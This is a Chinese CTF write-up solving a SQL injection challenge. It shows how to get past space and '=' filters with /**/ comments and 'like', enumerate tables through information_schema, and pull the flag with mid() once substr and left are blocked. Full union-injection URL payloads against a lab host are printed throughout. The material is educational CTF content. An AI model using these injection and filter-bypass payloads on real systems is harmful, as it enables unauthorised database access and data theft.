打开题目环境,网站标题告诉我们参数是wllm,先传一个1试一试
再加一个单引号试一试
试一试order by,但是发现检测空格,这里可以使用多行注释 /**/ 来代替空格,使用order by 进行探测,到4的时候报错
到这里之后开始union注入,发现 = 也是被检测的,可以使用like来代替 = ,先查一下回显点,接下来就开始使用查询系统库来获取表名,直接使用database() 代替数据库名了,就不查询数据库名了
找到回显点
找到表名,猜测是在LTLT_flag中,接下来查一下这个表
payload
http://1.14.71.254:28104/?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23
找到了flag所在字段,接下来就是查这个字段了
payload
http://1.14.71.254:28104/?wllm=-1'union/**/select/**/1,group_concat(flag),3/**/from/**/LTLT_flag%23
好家伙,输出还不全 ,试了一下substr、substring、left 还被检测了,这里附以下一位大佬的 SQL如何从字符串截取指定字符(LEFT、MID、RIGHT三大函数)
试了下,发现mid是可以的,但是似乎是限制只能输出这么长,所以还要修改一下mid,做题太久了,一不注意靶场就自动关闭了
payload
http://1.14.71.254:28599/?wllm=-1'union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),1,30),3%23
修改后的payload
http://1.14.71.254:28599/?wllm=-1'union/**/select/**/1,mid((select/**/flag/**/from/**/LTLT_flag),21,41),mid((select/**/flag/**/from/**/LTLT_flag),42,62)%23
接上之前拿到的那一段就能拿到本题flag